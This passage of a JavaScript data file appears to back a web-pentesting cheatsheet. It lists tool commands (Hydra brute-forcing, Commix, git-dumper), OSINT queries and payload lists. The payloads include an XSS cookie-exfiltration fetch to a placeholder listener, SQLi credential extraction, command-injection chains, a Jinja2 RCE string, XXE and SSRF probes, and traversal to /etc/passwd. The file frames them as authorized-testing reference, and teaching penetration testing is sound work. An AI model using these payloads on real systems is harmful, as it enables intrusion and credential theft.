      { label: 'Scan a list of URLs concurrently', cmd: 'python3 corsy.py -i urls_{target}.txt -t 10', why: 'Runs the same CORS checks across many URLs concurrently, useful once recon has produced a large API/endpoint list.' },
    ],
  },
  {
    id: 'secrets',
    tool: 'git-dumper / TruffleHog',
    category: 'misc',
    categoryLabel: 'Misc',
    desc: 'Recover an exposed .git directory and sweep it (or any repo) for hard-coded secrets.',
    commands: [
      { label: 'Dump an exposed .git directory', cmd: 'git-dumper https://{target}/.git ./dump_{target}', why: 'If .git/ is accidentally exposed on the live site, reconstructs the entire repository from the raw objects — often revealing source code, old credentials, or internal comments never meant to ship.' },
      { label: 'Scan the dumped repo for secrets', cmd: 'trufflehog filesystem ./dump_{target}', why: "Scans the recovered repo's full commit history — not just current files — for high-entropy strings and known secret patterns. Keys often get committed and 'removed' later while still sitting in history." },
      { label: 'Scan a public/internal repo directly', cmd: 'trufflehog git https://github.com/org/repo.git', why: "Runs the same secret-scanning directly against a remote repo URL when you don't need to dump it first — e.g. a public GitHub repo tied to the target." },
    ],
  },
  {
    id: 'feroxbuster',
    tool: 'Feroxbuster',
    category: 'scanning',
    categoryLabel: 'Scanning',
    desc: 'Rust-based recursive content discovery — like Gobuster/ffuf, but automatically dives into directories it finds without a second command.',
    commands: [
      { label: 'Recursive directory brute force', cmd: 'feroxbuster -u https://{target} -w raft-medium-directories.txt', why: 'Recursively brute-forces directories and automatically re-scans every folder it finds — saves you from manually re-running the scan a level deeper each time.' },
      { label: 'Add extensions and raise thread count', cmd: 'feroxbuster -u https://{target} -x php,html,js -t 100', why: "Appends common extensions to every guess and raises concurrency — worth it once you've confirmed the target can handle a faster scan without rate-limiting you." },
      { label: 'Hide known noise status codes', cmd: 'feroxbuster -u https://{target} -w wordlist.txt --filter-status 404,403', why: 'Filters out expected 404/403 noise so the output only shows responses actually worth investigating.' },
      { label: 'Cap recursion depth', cmd: 'feroxbuster -u https://{target} -d 2 --dont-extract-links', why: 'Limits recursion to two directory levels to avoid a runaway scan on a huge site while still covering the top-level structure.' },
    ],
  },
  {
    id: 'hydra',
    tool: 'Hydra',
    category: 'auth',
    categoryLabel: 'Auth / JWT',
    desc: 'Fast network login brute-forcer. Only ever point this at a login form or account you are explicitly authorized to attack.',
    commands: [
      { label: 'Brute-force a web login form', cmd: 'hydra -l admin -P rockyou.txt {target} http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"', why: 'Brute-forces a known username against a password list on a web login form, using the literal failure string so Hydra can tell which attempts failed.' },
      { label: 'Brute-force HTTP Basic Auth', cmd: 'hydra -L users.txt -P passwords.txt {target} https-get /admin/', why: 'Tries every combination from a username list and password list against an HTTP Basic-Auth-protected path.' },
      { label: 'Throttle to avoid lockout / rate limits', cmd: 'hydra -l admin -P rockyou.txt -t 4 {target} http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"', why: 'Drops concurrency to 4 threads so the attack stays under an account-lockout or WAF rate-limit threshold — trading speed for not locking out the account you\'re testing.' },
    ],
  },
  {
    id: 'cewl',
    tool: 'CeWL',
    category: 'recon',
    categoryLabel: 'Recon',
    desc: "Spiders a website and builds a custom wordlist from the words it actually uses — often more effective than a generic list for guessing credentials tied to the target's own content.",
    commands: [
      { label: 'Build a wordlist from site content', cmd: 'cewl https://{target} -d 2 -m 5 -w wordlist_{target}.txt', why: 'Crawls two links deep, keeps words of at least 5 characters, and writes them to a wordlist you can feed into Hydra or a login-fuzzing session.' },
      { label: 'Include emails and author metadata', cmd: 'cewl https://{target} -e -a -w wordlist_{target}.txt', why: 'Also collects email addresses (-e) and document author metadata (-a) found on the site — useful for building a username list, not just passwords.' },
    ],
  },
  {
    id: 'interactsh',
    tool: 'Interactsh',
    category: 'misc',
    categoryLabel: 'Misc',
    desc: 'Out-of-band interaction client — gives you a unique domain to catch DNS/HTTP callbacks, the standard way to confirm blind SSRF, XXE, or SSTI.',
    commands: [
      { label: 'Start a listener session', cmd: 'interactsh-client', why: "Starts a session and prints a unique *.oast.* hostname — drop that hostname into any blind SSRF/XXE/SSTI payload (in place of 'YOUR-LISTENER') and watch this terminal for the callback." },
      { label: 'Verbose interaction logging', cmd: 'interactsh-client -v', why: 'Prints full interaction details — source IP, request headers, DNS query type — instead of a one-line summary, useful when you need to prove exactly how the server reached out.' },
    ],
  },
  {
    id: 'commix',
    tool: 'Commix',
    category: 'injection',
    categoryLabel: 'Injection',
    desc: 'Automated OS command injection detection and exploitation across GET/POST parameters, headers, and cookies.',
    commands: [
      { label: 'Test a GET parameter', cmd: 'commix --url="https://{target}/page?ip=1"', why: "Tests the given parameter for command injection using Commix's full technique set (classic, blind, time-based, file-based) automatically." },
      { label: 'Test a POST parameter', cmd: 'commix --url="https://{target}/page" --data="host=1"', why: 'Targets a POST body parameter instead of a query string, for when the injectable field is submitted via a form.' },
      { label: 'Increase testing thoroughness', cmd: 'commix --url="https://{target}/page?ip=1" --level=3', why: "Raises Commix's testing depth — more injection techniques and payload variations — once a quick pass hasn't confirmed a hit but the parameter still looks reachable." },
      { label: 'Run a command once injection is confirmed', cmd: 'commix --url="https://{target}/page?ip=1" --os-cmd="whoami"', why: 'Runs one specific, harmless command through the confirmed-vulnerable parameter as the proof-of-concept step.' },
    ],
  },
  {
    id: 'xsstrike',
    tool: 'XSStrike',
    category: 'xss',
    categoryLabel: 'XSS',
    desc: "Context-aware XSS scanner that parses the actual response to craft payloads for the specific injection context, instead of firing a static payload list.",
    commands: [
      { label: 'Scan a single parameter', cmd: 'xsstrike -u "https://{target}/page?q=test"', why: 'Analyzes exactly how the parameter is reflected (attribute, script block, HTML body) and generates payloads tailored to that context — catching bypasses generic scanners miss.' },
      { label: 'Skip the slower DOM-XSS check', cmd: 'xsstrike -u "https://{target}/page?q=test" --skip-dom', why: 'Skips the headless-browser DOM-XSS check when you only care about reflected XSS and want a faster pass.' },
      { label: 'Crawl the site and test discovered params', cmd: 'xsstrike --crawl -u https://{target}', why: 'Crawls the site to discover parameters on its own, then tests each one — no need to supply every URL manually.' },
    ],
  },
  {
    id: 'graphql',
    tool: 'GraphQL Cop',
    category: 'scanning',
    categoryLabel: 'Scanning',
    desc: 'Runs a standard battery of GraphQL-specific misconfiguration checks — introspection exposure, field suggestions, batching abuse, and more.',
    commands: [
      { label: 'Run the full check suite', cmd: 'graphql-cop -t https://{target}/graphql', why: 'Runs every standard GraphQL misconfiguration check in one command instead of testing introspection, batching, and field-suggestion issues by hand.' },
      { label: 'Write machine-readable output', cmd: 'graphql-cop -t https://{target}/graphql -o results.json', why: 'Writes structured JSON output so findings can be attached as evidence or fed into another tool.' },
    ],
  },
  {
    id: 'zap-baseline',
    tool: 'OWASP ZAP (Baseline)',
    category: 'vuln',
    categoryLabel: 'Vuln Scan',
    desc: "ZAP's headless Docker scan — a passive/light-active pass across the whole site without needing the desktop GUI.",
    commands: [
      { label: 'Run a baseline scan', cmd: 'docker run -t owasp/zap2docker-stable zap-baseline.py -t https://{target}', why: "Spiders the site and runs ZAP's passive scan rules end-to-end in a container — a good automated complement to Nikto/Nuclei that catches many OWASP Top 10-style issues." },
      { label: 'Save the results as an HTML report', cmd: 'docker run -t owasp/zap2docker-stable zap-baseline.py -t https://{target} -r report.html', why: 'Writes the results to a shareable HTML report instead of just console output.' },
    ],
  },
  {
    id: 'retirejs',
    tool: 'Retire.js',
    category: 'vuln',
    categoryLabel: 'Vuln Scan',
    desc: 'Scans for known-vulnerable JavaScript libraries by fingerprinting file hashes and version strings against a public CVE database.',
    commands: [
      { label: 'Crawl the live site for vulnerable JS', cmd: 'retire --crawl https://{target}', why: "Crawls the live site's script tags and checks every JS library it finds against Retire.js's vulnerability database — the fastest way to confirm OWASP A06 on the client side." },
      { label: 'Scan a local copy of site assets', cmd: 'retire --js --path ./downloaded-assets', why: 'Scans a local copy of the JS assets directly (e.g. from a git-dumper recovery) instead of crawling live — also works fully offline.' },
    ],
  },
  {
    id: 'eyewitness',
    tool: 'EyeWitness',
    category: 'recon',
    categoryLabel: 'Recon',
    desc: 'Takes screenshots of a large list of web hosts so you can visually triage hundreds of subdomains in minutes instead of opening each one by hand.',
    commands: [
      { label: 'Screenshot a subdomain list', cmd: 'eyewitness --web -f subdomains_{target}.txt -d screenshots_{target}', why: 'Screenshots every URL in a subdomain list and builds an HTML report you can skim visually — the fastest way to spot login panels, default install pages, or dev environments across a huge subdomain list.' },
      { label: 'Screenshot a single URL', cmd: 'eyewitness --web --single https://{target} --no-prompt', why: 'Screenshots just one URL without the interactive prompts — useful when scripting EyeWitness into a larger pipeline.' },
    ],
  },
];

const CHEATSHEET_CATEGORIES = [
  { id: 'all', label: 'All' },
  { id: 'recon', label: 'Recon' },
  { id: 'scanning', label: 'Scanning' },
  { id: 'vuln', label: 'Vuln Scan' },
  { id: 'injection', label: 'Injection' },
  { id: 'xss', label: 'XSS' },
  { id: 'auth', label: 'Auth / JWT' },
  { id: 'tls', label: 'TLS / SSL' },
  { id: 'cms', label: 'CMS' },
  { id: 'misc', label: 'Misc' },
];

/* ============================================================
   OSINT: passive intelligence-gathering techniques and tools,
   grouped by discipline. Everything here is publicly-available
   data mining — no packets sent to the target's infrastructure
   unless a command explicitly says otherwise.
   ============================================================ */

const OSINT = [
  {
    id: 'whois-dns',
    tool: 'WHOIS & DNS Records',
    category: 'dns',
    categoryLabel: 'Domain & DNS',
    desc: 'The starting point for any target — registrar info, name servers, and every record type the domain publishes.',
    commands: [
      { label: 'Full WHOIS lookup', cmd: 'whois {target}', why: 'Pulls registrar, registration/expiry dates, and — when not redacted by a privacy proxy — registrant contact details. Often reveals the hosting provider or a related organization.' },
      { label: 'All DNS record types', cmd: 'dig {target} ANY +noall +answer', why: "Requests every record type in one query — a fast first pass, though many resolvers now restrict ANY queries, so treat this as a starting point rather than the full picture." },
      { label: 'Mail server records', cmd: 'dig {target} MX +short', why: 'Identifies the mail provider (Google Workspace, Microsoft 365, self-hosted) — useful context for phishing-adjacent findings and for scoping SPF/DKIM checks.' },
      { label: 'Text records (SPF/DKIM/verification)', cmd: 'dig {target} TXT +short', why: 'TXT records often leak third-party integrations — site-verification tokens for Google/Facebook/Stripe, or SPF includes that reveal outbound mail providers.' },
      { label: 'Attempt a zone transfer', cmd: 'dig axfr @ns1.{target} {target}', why: 'A misconfigured name server that allows zone transfers hands you the entire DNS zone in one request — rare today, but still a free one-line check.' },
      { label: 'Name servers', cmd: 'host -t ns {target}', why: 'Confirms who actually hosts the DNS (Cloudflare, Route 53, in-house) — shapes which passive recon sources will actually have useful data.' },
    ],
  },
  {
    id: 'subdomain-passive',
    tool: 'Passive Subdomain Enumeration',
    category: 'dns',
    categoryLabel: 'Domain & DNS',
    desc: "Mapping the subdomain attack surface using only public data sources — no direct probing of the target's infrastructure.",
    commands: [
      { label: 'Certificate transparency lookup', cmd: 'curl -s "https://crt.sh/?q=%25.{target}&output=json" | jq -r \'.[].name_value\' | sort -u', why: 'Every publicly-trusted TLS certificate ever issued for the domain is permanently logged in CT logs — this mines that log for every subdomain a cert was ever issued for, including retired ones.' },
      { label: 'subfinder', cmd: 'subfinder -d {target} -silent', why: 'Aggregates dozens of passive sources (APIs, search engines, CT logs) into one deduplicated list without sending the target a single packet.' },
      { label: 'Amass, passive mode', cmd: 'amass enum -passive -d {target}', why: "Covers an even broader set of passive sources than subfinder alone — a good cross-check to catch anything subfinder's source list misses." },
      { label: 'assetfinder', cmd: 'assetfinder --subs-only {target}', why: 'A lighter, faster alternative that\'s handy for a quick pass or for piping straight into another tool.' },
    ],
  },
  {
    id: 'dorking',
    tool: 'Search-Engine Dorking & Open Directories',
    category: 'dorking',
    categoryLabel: 'Search Dorking',
    desc: 'Advanced search operators that mine what Google/Bing have already indexed — often the fastest way to find data nobody meant to publish.',
    commands: [
      { label: 'Find open directory listings', cmd: 'site:{target} intitle:"index of /"', why: 'Surfaces open directory listings that expose raw file structure — often backups, configs, or logs never meant to be browsable.' },
      { label: 'Find publicly indexed documents', cmd: 'site:{target} filetype:pdf OR filetype:docx OR filetype:xlsx', why: 'Finds indexed documents that can leak internal structure, employee names, or hidden metadata once downloaded.' },
      { label: 'Find leaked backups, logs, and DB dumps', cmd: 'site:{target} ext:sql OR ext:log OR ext:bak OR ext:env', why: 'Targets accidentally-indexed backup, log, and environment files — a very common source of hard-coded credentials.' },
      { label: 'Find exposed admin/login entry points', cmd: 'site:{target} inurl:admin OR inurl:login OR inurl:wp-content', why: 'Surfaces admin panels and login pages that search engines have already crawled, saving a round of manual directory brute-forcing.' },
      { label: 'Check paste sites for leaked data', cmd: 'intext:"{target}" site:pastebin.com', why: 'Checks whether credentials, configs, or source code tied to the target have leaked to a public paste site.' },
      { label: 'Find exposed error messages / stack traces', cmd: 'site:{target} intext:"Warning:" OR intext:"stack trace" OR intext:"Fatal error"', why: 'Verbose error pages accidentally left indexed often reveal file paths, framework versions, or database details.' },
      { label: "View a page via the engine's cache", cmd: 'cache:{target}', why: "Shows the search engine's last cached copy of a page — occasionally still shows content that's since been taken down or changed." },
      { label: 'Manually check a path for a listing', cmd: 'curl -s https://{target}/backup/ | grep -i "index of"', why: 'Quick manual check for an open directory listing on a specific path — no tooling needed to confirm a hit.' },
      { label: 'Mirror a confirmed open directory', cmd: 'wget -r -np -nH --reject "index.html*" https://{target}/exposed-dir/', why: 'Once a listing is confirmed, recursively mirrors its full contents locally for offline review instead of clicking through every file in a browser.' },
      { label: 'Crawl specifically for open directories', cmd: 'dirhunt https://{target}', why: 'Crawls the site looking specifically for open directory listings rather than brute-forcing a wordlist — often finds real ones faster than gobuster/ffuf for this one purpose.' },
    ],
  },
  {
    id: 'scan-engines',
    tool: 'Internet-Wide Scan Engines',
    category: 'scanners',
    categoryLabel: 'Scan Engines',
    desc: 'Shodan, Censys, and ZoomEye continuously scan the entire public internet — search their index instead of scanning the target yourself.',
    commands: [
      { label: 'Shodan: search by hostname', cmd: 'shodan search hostname:{target}', why: "Finds every service Shodan has already fingerprinted for the target's hostname, including forgotten or unlinked systems, with zero traffic sent to the target." },
      { label: 'Shodan: full host history', cmd: 'shodan host <ip>', why: 'Returns the full banner/service history Shodan has recorded for a specific IP tied to the target, including ports you might not have scanned yet.' },
      { label: 'Shodan: search by organization', cmd: 'shodan search org:"Target Org Name"', why: 'Finds infrastructure registered under the organization\'s name even when it doesn\'t share the same domain — useful for spotting forgotten or shadow-IT assets.' },
      { label: 'Censys: search by TLS certificate', cmd: 'censys search "services.tls.certificates.leaf_data.subject.common_name: {target}"', why: 'Finds every host presenting a certificate for the domain — a reliable way to turn up forgotten subdomains or internal hosts that happen to have a public IP.' },
      { label: 'ZoomEye query (web UI syntax)', cmd: 'app:"nginx" hostname:"{target}"', why: 'ZoomEye indexes a different crawl set than Shodan/Censys — worth cross-checking when the other two come up empty.' },
    ],
  },
  {
    id: 'certs',
    tool: 'Certificate Transparency & TLS Intel',
    category: 'certs',
    categoryLabel: 'Certificates',
    desc: 'Certificates are public by design — mining them surfaces subdomains, organizational naming conventions, and cert-management hygiene.',
    commands: [
      { label: 'Search crt.sh by organization name', cmd: 'curl -s "https://crt.sh/?q=O=%27Target+Org%27&output=json"', why: 'Finds every certificate issued to the organization by name, not just by domain — catches related brands and subsidiaries sharing the same registrant.' },
      { label: 'Pull live certificate details', cmd: 'openssl s_client -connect {target}:443 -servername {target} </dev/null 2>/dev/null | openssl x509 -noout -text', why: 'Reads the SANs (Subject Alternative Names) directly off the live certificate — often lists several related hostnames in one cert.' },
      { label: 'Censys certificate search', cmd: 'censys search "parsed.names: {target}"', why: "An alternative certificate index to crt.sh — useful as a cross-check since coverage between CT log aggregators isn't identical." },
    ],
  },
  {
    id: 'people',
    tool: 'People & Employee OSINT',
    category: 'people',
    categoryLabel: 'People',
    desc: 'Employee and org-structure intel for building a realistic username/password-spray list and spotting social-engineering surface — public data only.',
    commands: [
      { label: 'theHarvester: pull from every source', cmd: 'theHarvester -d {target} -b all', why: 'Aggregates emails, subdomains, and employee names from every supported OSINT source in one run — a fast starting point for both recon and a password-spray username list.' },
      { label: 'theHarvester: narrow sources, more results', cmd: 'theHarvester -d {target} -b google,bing,linkedin -l 200', why: 'Narrows collection to specific sources and raises the result limit for a deeper pull when the broad scan surfaces too little.' },
      { label: 'LinkedIn X-ray search', cmd: 'site:linkedin.com/in "{target}"', why: 'Finds employee profiles indexed by search engines without needing a LinkedIn account or scraping the site directly.' },
      { label: 'Spot the email naming convention', cmd: 'site:{target} "@{target}"', why: "Publicly indexed pages sometimes reveal the organization's email format (first.last@, flast@, etc.) directly." },
      { label: 'Username sweep across platforms', cmd: 'sherlock <username>', why: 'Checks a candidate username against hundreds of platforms in one pass — useful once you have a naming convention to test.' },
    ],
  },
  {
    id: 'code-osint',
    tool: 'Code & Repository OSINT',
    category: 'code',
    categoryLabel: 'Code & Repos',
    desc: 'Source code and commit history leak more secrets than almost any other source — worth checking even before a specific repo is known.',
    commands: [
      { label: 'Search GitHub code for the target', cmd: 'gh search code "{target}" --limit 50', why: 'Searches GitHub\'s code index for any reference to the target domain — internal tools, config files, or scripts that mention it by name.' },
      { label: 'Target a specific secrets-prone filename', cmd: 'gh search code "{target}" filename:.env', why: 'Targets a specific high-value filename pattern known for containing hard-coded credentials.' },
      { label: 'Find the organization\'s own repos', cmd: 'gh search repos "{target}" --limit 30', why: "Surfaces public repositories owned by or related to the organization that might not be linked from their main site." },
      { label: 'Scan a discovered repo for secrets', cmd: 'trufflehog git https://github.com/org/repo.git', why: 'Once a relevant repo is found, scans its full commit history for secrets that were committed and later "removed" but still sit in history.' },
    ],
  },
  {
    id: 'cloud-assets',
    tool: 'Cloud Asset Discovery',
    category: 'cloud',
    categoryLabel: 'Cloud Assets',
    desc: 'Cloud storage buckets are frequently misconfigured to allow public listing — worth checking common naming patterns even without a confirmed lead.',
    commands: [
      { label: 'Guess common S3 bucket names', cmd: 'for w in {target} {target}-backup {target}-dev {target}-assets; do curl -s -o /dev/null -w "%{http_code} $w\\n" https://$w.s3.amazonaws.com; done', why: 'Cheaply tests a handful of common naming conventions against S3\'s URL scheme — a 200 or 403 (vs. a DNS failure) tells you the bucket exists even if it\'s not public.' },
      { label: 'cloud_enum across AWS/Azure/GCP', cmd: 'cloud_enum -k {target}', why: 'Automates the same guessing approach across all three major clouds\' storage-naming conventions in one run instead of testing each manually.' },
      { label: 'Search already-discovered open buckets', cmd: 'grayhatwarfare.com search: "{target}"', why: 'A searchable index of buckets other researchers have already found open — worth checking before enumerating anything yourself.' },
    ],
  },
  {
    id: 'web-archives',
    tool: 'Web Archive Mining',
    category: 'archive',
    categoryLabel: 'Web Archives',
    desc: 'Historical snapshots often reveal endpoints, parameters, and features that were removed from the live site but never actually decommissioned.',
    commands: [
      { label: 'Pull every known URL from the Wayback Machine', cmd: 'curl -s "http://web.archive.org/cdx/search/cdx?url={target}/*&output=text&fl=original&collapse=urlkey"', why: 'Lists every URL the Wayback Machine has ever archived for the domain — a goldmine of old, forgotten endpoints.' },
      { label: 'Query the Common Crawl index', cmd: 'curl -s "https://index.commoncrawl.org/CC-MAIN-2024-33-index?url={target}/*&output=json"', why: 'Common Crawl indexes a different, broader crawl than the Wayback Machine — a useful second historical source.' },
      { label: 'Check archive.today for manual snapshots', cmd: 'https://archive.ph/https://{target}', why: 'archive.today captures on-demand snapshots people have manually saved — sometimes preserves pages the Wayback Machine\'s crawler never reached.' },
    ],
  },
  {
    id: 'metadata-osint',
    tool: 'Document Metadata Harvesting',
    category: 'metadata',
    categoryLabel: 'Metadata',
    desc: 'Public documents (PDFs, Office files) routinely carry hidden metadata worth mining once dorking has pulled a few down.',
    commands: [
      { label: 'Inspect a single downloaded file', cmd: 'exiftool downloaded-file.pdf', why: 'Extracts hidden metadata — author names, internal file paths, software versions, sometimes GPS data — from a single document harvested off the target site.' },
      { label: 'Batch-scan a folder of harvested documents', cmd: 'exiftool -r ./downloaded-docs/', why: 'Batch-extracts metadata from every downloaded document at once — useful after a dorking pass has pulled down a whole folder of PDFs/DOCs.' },
      { label: 'Metagoofil: find, download, and extract in one pass', cmd: 'metagoofil -d {target} -t pdf,doc,docx,xls,xlsx -l 50 -n 20 -o results -f results.html', why: 'Combines the dork-and-download step with metadata extraction — searches for public documents, downloads them, and pulls metadata automatically.' },
    ],
  },
  {
    id: 'infra-asn',
    tool: 'Infrastructure & ASN Recon',
    category: 'infra',
    categoryLabel: 'Infrastructure',
    desc: "Mapping the IP ranges and network the target actually sits in — useful for spotting related infrastructure sharing the same block.",
    commands: [
      { label: 'List every prefix announced by an ASN', cmd: "whois -h whois.radb.net -- '-i origin AS12345'", why: "Once you know the target's ASN, this lists every IP prefix it announces — revealing its full address space." },
      { label: 'Find the ASN behind an IP', cmd: 'whois {ip} | grep -i origin', why: "The first step toward mapping a network's full range: find which ASN a specific known IP belongs to." },
      { label: "Hurricane Electric's BGP toolkit", cmd: 'bgp.he.net/AS12345', why: "The fastest manual way to browse an organization's announced ASNs and prefixes without any tooling." },
      { label: 'Reverse IP lookup via Shodan', cmd: 'shodan host {ip}', why: 'Shows every other hostname Shodan has seen resolve to the same IP — useful for spotting other sites sharing infrastructure with the target.' },
    ],
  },
  {
    id: 'breach-social',
    tool: 'Breach & Social Intelligence',
    category: 'breach',
    categoryLabel: 'Breach Intel',
    desc: "Checking whether the organization's data already appears in a public breach — informs both risk context and realistic password-spray wordlists.",
    commands: [
      { label: 'Check a domain against known breaches', cmd: 'curl -s -H "hibp-api-key: YOUR_KEY" "https://haveibeenpwned.com/api/v3/breacheddomain/{target}"', why: "Confirms whether email addresses on the domain have appeared in a known public breach. HIBP's domain-search endpoint requires a paid API key — this is the exact call once you have one." },
      { label: 'Check a single email address', cmd: 'curl -s -H "hibp-api-key: YOUR_KEY" "https://haveibeenpwned.com/api/v3/breachedaccount/user@{target}"', why: "Checks one specific address at a time — usable at HIBP's lower-tier limits without a full domain-search subscription." },
    ],
  },
];

const OSINT_CATEGORIES = [
  { id: 'all', label: 'All' },
  { id: 'dns', label: 'Domain & DNS' },
  { id: 'dorking', label: 'Search Dorking' },
  { id: 'scanners', label: 'Scan Engines' },
  { id: 'certs', label: 'Certificates' },
  { id: 'people', label: 'People' },
  { id: 'code', label: 'Code & Repos' },
  { id: 'cloud', label: 'Cloud Assets' },
  { id: 'archive', label: 'Web Archives' },
  { id: 'metadata', label: 'Metadata' },
  { id: 'infra', label: 'Infrastructure' },
  { id: 'breach', label: 'Breach Intel' },
];

/* ============================================================
   Payloads: copy-paste probes grouped by vulnerability class.
   Educational / authorized-testing reference — confirm, don't fire blind.
   ============================================================ */

const PAYLOADS = [
  {
    id: 'xss',
    name: 'Cross-Site Scripting (XSS)',
    category: 'xss',
    categoryLabel: 'XSS',
    desc: 'Probes for reflected, stored, and DOM-based XSS. Start with the plain alert PoC before trying filter-bypass variants.',
    payloads: [
      { label: 'Basic script tag', value: '<script>alert(1)</script>' },
      { label: 'IMG onerror (when <script> is filtered)', value: '<img src=x onerror=alert(1)>' },
      { label: 'SVG onload', value: '<svg onload=alert(1)>' },
      { label: 'Break out of an existing attribute', value: '" onmouseover="alert(1)' },
      { label: 'javascript: URI', value: '<a href="javascript:alert(1)">click</a>' },
      { label: 'No-parenthesis bypass', value: '<script>alert`1`</script>' },
      { label: 'Cookie exfiltration PoC (needs your own listener)', value: '<script>fetch("https://YOUR-LISTENER/?c="+document.cookie)</script>' },
    ],
  },
  {
    id: 'sqli',
    name: 'SQL Injection',
    category: 'injection',
    categoryLabel: 'SQLi',
    desc: 'Auth-bypass and extraction primitives. Confirm the backend engine before relying on engine-specific syntax.',
    payloads: [
      { label: 'Generic auth bypass', value: "' OR '1'='1" },
      { label: 'Auth bypass with trailing comment', value: "admin'--" },
      { label: 'Boolean-based blind — true condition', value: "' AND 1=1--" },
      { label: 'Boolean-based blind — false condition', value: "' AND 1=2--" },
      { label: 'UNION column-count probe', value: "' ORDER BY 10--" },
      { label: 'UNION-based extraction', value: "' UNION SELECT username, password FROM users--" },
      { label: 'Time-based blind (MySQL)', value: "' AND SLEEP(5)--" },
      { label: 'Time-based blind (MSSQL)', value: "'; WAITFOR DELAY '0:0:5'--" },
      { label: 'Time-based blind (PostgreSQL)', value: "' AND pg_sleep(5)--" },
      { label: 'Error-based (MySQL)', value: "' AND extractvalue(1,concat(0x7e,(SELECT version())))--" },
    ],
  },
  {
    id: 'cmdi',
    name: 'Command Injection',
    category: 'cmdi',
    categoryLabel: 'Cmd Injection',
    desc: 'Test any input that might reach a shell (filenames, hosts, IPs). Prefer harmless commands like whoami or a timed sleep.',
    payloads: [
      { label: 'Command chaining', value: '; whoami' },
      { label: 'Pipe chaining', value: '| whoami' },
      { label: 'Command substitution (backticks)', value: '`whoami`' },
      { label: 'Command substitution (POSIX)', value: '$(whoami)' },
      { label: 'Chain only on success', value: '&& whoami' },
      { label: 'Windows chaining', value: '& whoami' },
      { label: 'Blind detection via delay (Linux)', value: '; sleep 5' },
      { label: 'Blind detection via delay (Windows)', value: '& ping -n 6 127.0.0.1' },
    ],
  },
  {
    id: 'ssti',
    name: 'Server-Side Template Injection',
    category: 'ssti',
    categoryLabel: 'SSTI',
    desc: 'The math probe identifies whether — and which — template engine is evaluating user input before you escalate toward RCE.',
    payloads: [
      { label: 'Generic math probe', value: '${7*7}' },
      { label: 'Jinja2 / Twig probe', value: '{{7*7}}' },
      { label: 'Freemarker probe', value: '<#assign x=7*7>${x}' },
      { label: 'Polyglot to fingerprint the engine', value: "${{<%[%'\"}}%\\." },
      { label: 'Jinja2 RCE via config globals', value: "{{ config.__class__.__init__.__globals__['os'].popen('id').read() }}" },
    ],
  },
  {
    id: 'traversal',
    name: 'Path / Directory Traversal',
    category: 'traversal',
    categoryLabel: 'Path Traversal',
    desc: 'Read files outside the intended web root. Adjust the ../ depth to match how deep the target directory actually nests.',
    payloads: [
      { label: 'Linux passwd file', value: '../../../../../../etc/passwd' },
      { label: 'URL-encoded traversal', value: '..%2f..%2f..%2f..%2fetc%2fpasswd' },
      { label: 'Double URL-encoded (naive WAF bypass)', value: '..%252f..%252f..%252fetc%252fpasswd' },
      { label: 'Windows target', value: '..\\..\\..\\..\\windows\\win.ini' },
      { label: 'Null-byte truncation (legacy PHP)', value: '../../../../etc/passwd%00' },
    ],
  },
  {
    id: 'xxe',
    name: 'XML External Entity (XXE)',
    category: 'xxe',
    categoryLabel: 'XXE',
    desc: 'Any endpoint that parses XML input is a candidate — file uploads, SOAP APIs, SAML, and Office/OOXML formats.',
    payloads: [
      { label: 'Basic file read', value: '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY x SYSTEM "file:///etc/passwd">]><r>&x;</r>' },
      { label: 'Out-of-band / blind XXE', value: '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % x SYSTEM "http://YOUR-LISTENER/evil.dtd">%x;]>' },
      { label: 'SSRF via XXE to cloud metadata', value: '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY x SYSTEM "http://169.254.169.254/latest/meta-data/">]><r>&x;</r>' },
    ],
  },
  {
    id: 'ssrf',
    name: 'Server-Side Request Forgery (SSRF)',
    category: 'ssrf',
    categoryLabel: 'SSRF',
    desc: 'Get the server to fetch a URL you control, or reach an address it should never be able to.',
    payloads: [
      { label: 'Cloud metadata endpoint (AWS/GCP/Azure)', value: 'http://169.254.169.254/latest/meta-data/' },
      { label: 'Localhost bypass via decimal IP', value: 'http://2130706433/' },
      { label: 'Localhost bypass via octal IP', value: 'http://0177.0.0.1/' },
      { label: 'Localhost bypass via IPv6', value: 'http://[::1]/' },
      { label: 'Out-of-band callback via your own listener', value: 'http://YOUR-LISTENER.example/' },
    ],
  },
  {
    id: 'redirect',
    name: 'Open Redirect',
    category: 'redirect',
    categoryLabel: 'Open Redirect',
    desc: 'Bypass naive same-domain or allow-list checks on a redirect parameter.',
    payloads: [
      { label: 'Protocol-relative bypass', value: '//evil.com' },
      { label: 'Backslash bypass (browsers normalize \\ to /)', value: '/\\evil.com' },
      { label: 'Userinfo trick — looks like target, resolves to evil.com', value: 'https://{target}@evil.com' },
      { label: 'Target-as-path trick against naive allow-lists', value: 'https://evil.com/{target}' },
    ],
  },
  {
    id: 'crlf',
    name: 'CRLF Injection',
    category: 'crlf',
    categoryLabel: 'CRLF Injection',
    desc: 'Inject CR/LF sequences into a value that ends up in a response header, splitting or smuggling additional headers.',
    payloads: [
      { label: 'Basic header injection', value: '%0d%0aSet-Cookie:%20session=hijacked' },
      { label: 'HTTP response splitting into a reflected body', value: '%0d%0a%0d%0a<script>alert(1)</script>' },
    ],
  },
  {
    id: 'nosql',
    name: 'NoSQL Injection',
    category: 'nosql',
    categoryLabel: 'NoSQLi',
    desc: 'Operator injection against MongoDB-style query parsers — usually delivered through a JSON request body.',
    payloads: [
      { label: 'Auth bypass via $ne', value: '{"username": "admin", "password": {"$ne": null}}' },
      { label: 'Auth bypass via $gt', value: '{"username": {"$gt": ""}, "password": {"$gt": ""}}' },
      { label: 'Blind boolean via $where (JS injection)', value: '{"$where": "this.password.length > 0"}' },
    ],
  },
];

const PAYLOAD_CATEGORIES = [
  { id: 'all', label: 'All' },
  { id: 'xss', label: 'XSS' },
  { id: 'injection', label: 'SQLi' },
  { id: 'cmdi', label: 'Cmd Injection' },
  { id: 'ssti', label: 'SSTI' },
  { id: 'traversal', label: 'Path Traversal' },
  { id: 'xxe', label: 'XXE' },
  { id: 'ssrf', label: 'SSRF' },
  { id: 'redirect', label: 'Open Redirect' },
  { id: 'crlf', label: 'CRLF' },
  { id: 'nosql', label: 'NoSQLi' },
];

/* ============================================================
   GitHub Tools: curated open-source repos for web pentesting & red teaming.
   ============================================================ */

const GITHUB_TOOLS = [
  {
    id: 'gh-recon',
    name: 'Recon & OSINT',
    category: 'recon',
